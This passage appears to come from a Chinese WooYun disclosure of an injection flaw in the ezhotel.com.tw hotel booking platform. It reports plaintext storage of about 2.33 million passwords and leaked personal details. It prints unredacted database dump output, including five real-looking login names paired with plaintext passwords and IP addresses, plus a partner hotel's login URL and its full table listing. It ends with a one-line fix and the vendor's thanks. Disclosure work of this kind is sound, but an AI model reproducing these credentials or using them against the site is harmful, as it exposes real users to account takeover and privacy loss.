看MemberLoginLog发现233W的账户信息都是明文密码:

Table: MemberLoginLog
[5 entries]
+-----------------+-------+------------+------------+---------------------+
| IP              | VarNo | LoginName  | LoginPass  | LoginTime           |
+-----------------+-------+------------+------------+---------------------+
| 210.202.81.67   | 3     | mife       | mifelalala | 2011-10-28 15:28:03 |
| 220.130.183.74  | 231   | yauco6     | yy560225   | 2011-10-28 15:28:33 |
| 1.200.155.129   | 420   | leonho     | leon1125   | 2011-10-28 15:28:44 |
| 220.138.129.224 | 226   | J221685791 | woxn77     | 2011-10-28 15:30:00 |
| 118.233.233.128 | 546   | 521410     | f8802439   | 2011-10-28 15:40:40 |
+-----------------+-------+------------+------------+---------------------+


登上mife账户发现身份证、手机号、座机和住址信息泄露

s2.jpg


2.928个数据库包含540+的合作商家数据库:
例如FULIRESORT,转化成小写是fuliresort

f.jpg


打开立即订房其实进的是这个链接:https://www.ezhotel.com.tw/fuliresort/index.php?__fromurl=1&hotelid=1

f1.jpg


https://www.ezhotel.com.tw/fuliresort/index.php?__fromurl=1&hotelid=1这里可以登录

f2.jpg


Database: FULIRESORT
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| PromotionRoomQty      | 6330    |
| LoginLogB             | 5739    |
| RoomQty_Log           | 5051    |
| RoomQty               | 3050    |
| LoginLogC             | 2318    |
| Access_User           | 2071    |
| TBL_Log               | 647     |
| LoginLog              | 611     |
| DateInfo              | 610     |
| PromotionDateInfo     | 549     |
| Access_Sub            | 367     |
| Access_Main           | 196     |
| RoomFacilitiesInfo    | 161     |
| PromotionPrice        | 118     |
| CustInfo              | 92      |
| HotelOrderListSSL     | 73      |
| PromotionPlatform     | 71      |
| Access_Title2         | 47      |
| Promotion             | 40      |
| CardInfo              | 35      |
| INVInfo               | 35      |
| OrderInfo             | 35      |
| PriceData             | 25      |
| PriceData_Eng         | 25      |
| HotelUsers            | 16      |
| OrderInfoWaiting      | 16      |
| AllowableIP           | 12      |
| PromotionGroup        | 12      |
| Access_Title1         | 11      |
| TK_ReportInfo         | 11      |
| QtySet                | 10      |
| Mail_Question         | 9       |
| OrderInfo_Msg_Log     | 8       |
| CancelSet             | 7       |
| TK_ClassSet           | 6       |
| TypeDef               | 6       |
| TypeDef_Eng           | 6       |
| PriceDef              | 5       |
| PriceDef_Eng          | 5       |
| RoomType              | 5       |
| RoomType1             | 5       |
| RoomType2             | 5       |
| RoomType3             | 5       |
| RoomType4             | 5       |
| RoomType_Eng          | 5       |
| PromotionPriceDef     | 3       |
| PromotionPriceDef_Eng | 3       |
| ExtraServiceB         | 2       |
| OrderNotice           | 2       |
| ExtraService          | 1       |
| HotelInfo             | 1       |
| HotelInfo1            | 1       |
| HotelInfo2            | 1       |
| HotelInfo3            | 1       |
| HotelInfo4            | 1       |
| HotelInfo_Eng         | 1       |
| TK_TicketOrderInfo    | 1       |
+-----------------------+---------+

修复方案:

过滤注入点,整型转化下

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-03-08 03:16

厂商回复:

感謝通報

最新状态:

暂无